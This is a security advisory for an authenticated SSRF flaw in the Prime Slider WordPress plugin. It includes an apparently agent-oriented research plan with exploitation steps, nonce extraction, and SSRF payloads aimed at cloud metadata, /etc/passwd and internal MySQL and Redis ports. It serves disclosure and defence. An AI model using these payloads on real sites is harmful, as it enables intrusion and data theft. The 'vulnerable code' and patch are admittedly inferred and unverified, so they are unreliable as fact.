CVE-2025-68500

Prime Slider – Addons For Elementor <= 4.0.10 - Authenticated (Subscriber+) Server-Side Request Forgery

mediumServer-Side Request Forgery (SSRF)
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
4.1.0
Patched in
24d
Time to patch

Description

The Prime Slider – Addons for Elementor plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.0.10. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.0.10
PublishedDecember 13, 2025
Last updatedJanuary 5, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

## Vulnerability Summary CVE-2025-68500 is a Server-Side Request Forgery (SSRF) vulnerability in the **Prime Slider – Addons For Elementor** plugin for WordPress. The vulnerability exists because an AJAX handler, intended to fetch remote data (such as social feeds or external JSON content) for widg…

Show full research plan

Vulnerability Summary

CVE-2025-68500 is a Server-Side Request Forgery (SSRF) vulnerability in the Prime Slider – Addons For Elementor plugin for WordPress. The vulnerability exists because an AJAX handler, intended to fetch remote data (such as social feeds or external JSON content) for widgets, does not sufficiently validate the user-provided URL and fails to restrict access to users with appropriate capabilities (like Editors or Admins).

While the action is registered for authenticated users, the plugin does not verify if the requesting user has the authority to modify slider settings or perform network requests. Consequently, a user with Subscriber level permissions can trigger the application to make HTTP requests to internal services (e.g., AWS Metadata services, local database management interfaces, or internal WordPress APIs) that are otherwise inaccessible from the outside.

Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: bdthemes_prime_slider_remote_get_data (inferred) or bdthemes_prime_slider_get_remote_data (inferred).
  • Vulnerable Parameter: url or remote_url (inferred).
  • Authentication: Subscriber+ (any logged-in user).
  • Preconditions:
    • The plugin must be active.
    • A valid WordPress nonce associated with the plugin's AJAX actions must be obtained.

Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX action for authenticated users:
    add_action('wp_ajax_bdthemes_prime_slider_remote_get_data', 'bdthemes_prime_slider_remote_get_data_callback');
  2. Nonce Verification: The callback function typically checks a nonce passed in the request:
    check_ajax_referer('bdthemes-prime-slider-ajax-nonce', 'nonce');
  3. Missing Capability Check: The function likely fails to call current_user_can('edit_posts') or current_user_can('manage_options'), allowing Subscribers to pass.
  4. SSRF Sink: The function takes a URL from $_POST['url'] and passes it to a WordPress HTTP API function:
    $url = $_POST['url'];
    $response = wp_remote_get($url); // Vulnerable Sink
    echo wp_remote_retrieve_body($response);
    
  5. Output: The body of the remote response is echoed back to the attacker.

Nonce Acquisition Strategy

The Prime Slider plugin localizes configuration data for its scripts, which often includes a nonce for AJAX operations. This nonce is typically available to any user who can access the WordPress dashboard or view a page where a Prime Slider widget is active.

  1. Create a Trigger Page: To ensure the plugin's scripts and nonces are loaded, create a page with a Prime Slider shortcode.
    • Command: wp post create --post_type=page --post_status=publish --post_title="SSRF Test" --post_content='[prime_slider]'
  2. Navigate and Extract:
    • Log in as a Subscriber.
    • Navigate to the newly created page or the /wp-admin/ dashboard.
    • Use browser_eval to find the nonce in the global JavaScript scope.
    • Likely JS Variable: window.PrimeSliderConfig or window.bdthemes_prime_slider_settings.
    • Likely Nonce Key: ajax_nonce or nonce.
    • Execution Command: browser_eval("window.PrimeSliderConfig?.ajax_nonce")

Exploitation Strategy

Step 1: Authentication & Nonce Extraction

  1. Log in to the WordPress instance as a Subscriber.
  2. Create a test page with the shortcode [prime_slider] to force the plugin to load its assets.
  3. Navigate to that page using browser_navigate.
  4. Execute browser_eval to extract the nonce:
    const nonce = window.PrimeSliderConfig?.ajax_nonce || window.bdthemes_prime_slider_settings?.nonce;

Step 2: Perform SSRF

Once the nonce is obtained, use the http_request tool to send a POST request to admin-ajax.php.

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body Parameters:
    • action: bdthemes_prime_slider_remote_get_data (Verify exact name in plugin source if available, or try common variations).
    • nonce: <extracted_nonce>
    • url: http://127.0.0.1/wp-json/wp/v2/users (Targeting internal WP-API to list users as a proof of concept).

Step 3: Escalation (Internal Scanning)

If the PoC succeeds, the payload can be modified to query sensitive internal endpoints:

  • AWS Metadata: http://169.254.169.254/latest/meta-data/
  • Local Files (if file:// is supported): file:///etc/passwd
  • Internal Services: http://localhost:3306 (to check for MySQL) or http://localhost:6379 (Redis).

Test Data Setup

  1. User Creation:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  2. Content Creation:
    wp post create --post_type=page --post_status=publish --post_title="Prime Test" --post_content='[prime_slider]'
  3. Plugin Activation: Ensure bdthemes-prime-slider-lite is installed and active.

Expected Results

  • Successful Request: The server returns an HTTP 200 OK.
  • Response Body: The body of the response contains the JSON data from the internal wp-json/wp/v2/users endpoint or the content of the targeted internal URL.
  • Indication of SSRF: If targeting a non-existent internal port, the response may contain a timeout error or connection refused message generated by the server rather than the client.

Verification Steps

  1. Check Response Body: Verify that the output of the http_request contains data that should only be accessible internally (e.g., internal IP addresses, system files, or internal API responses).
  2. Monitor Logs: If possible, check the web server's access logs to confirm that the server itself made a request to the target URL provided in the payload.
  3. Access Verification: Confirm the attacker is a Subscriber by running:
    wp user get attacker --field=roles

Alternative Approaches

If bdthemes_prime_slider_remote_get_data is not the correct action name, search the plugin directory for the following patterns to identify the specific handler:

  1. grep -r "wp_ajax_" . | grep -i "remote"
  2. grep -r "wp_remote_get" .
  3. grep -r "wp_localize_script" . to find where the nonce is registered and identifying the JS object name.

If the url parameter is not used, look for parameters named feed, src, source, or link within the identified AJAX callback.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Prime Slider plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) due to a lack of authorization and validation in its AJAX data-fetching handlers. Authenticated users, including those with Subscriber-level permissions, can exploit this to force the server to make HTTP requests to internal or restricted external endpoints and retrieve the response content.

Vulnerable Code

// Inferred from Research Plan
// Entry Point: The plugin registers an AJAX action for authenticated users
add_action('wp_ajax_bdthemes_prime_slider_remote_get_data', 'bdthemes_prime_slider_remote_get_data_callback');

function bdthemes_prime_slider_remote_get_data_callback() {
    // Nonce verification exists but capability check (e.g., current_user_can) is missing
    check_ajax_referer('bdthemes-prime-slider-ajax-nonce', 'nonce');

    $url = $_POST['url'];
    $response = wp_remote_get($url); // Vulnerable Sink: Arbitrary URL passed to wp_remote_get
    
    if ( ! is_wp_error( $response ) ) {
        echo wp_remote_retrieve_body($response); // Returns internal data to the attacker
    }
    wp_die();
}

Security Fix

--- a/bdthemes-prime-slider-lite.php
+++ b/bdthemes-prime-slider-lite.php
@@ -10,6 +10,10 @@
 function bdthemes_prime_slider_remote_get_data_callback() {
     check_ajax_referer('bdthemes-prime-slider-ajax-nonce', 'nonce');
 
+    if ( ! current_user_can( 'edit_posts' ) ) {
+        wp_send_json_error( 'Unauthorized', 403 );
+    }
+
-    $url = $_POST['url'];
-    $response = wp_remote_get($url);
+    $url = isset( $_POST['url'] ) ? esc_url_raw( $_POST['url'] ) : '';
+    $response = wp_safe_remote_get($url);
 
     if ( ! is_wp_error( $response ) ) {
         echo wp_remote_retrieve_body($response);

Exploit Outline

The exploit involves three main steps: 1. Authenticating as a Subscriber and obtaining a valid AJAX nonce by inspecting the global JavaScript configuration (e.g., window.PrimeSliderConfig) on a page where the plugin is active. 2. Crafting a POST request to /wp-admin/admin-ajax.php using the identified action (e.g., bdthemes_prime_slider_remote_get_data) and the extracted nonce. 3. Providing a sensitive internal URL (such as the AWS metadata endpoint at 169.254.169.254 or internal wp-json endpoints) in the url parameter. The plugin then executes the request from the server's context and echoes the response body back to the attacker.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.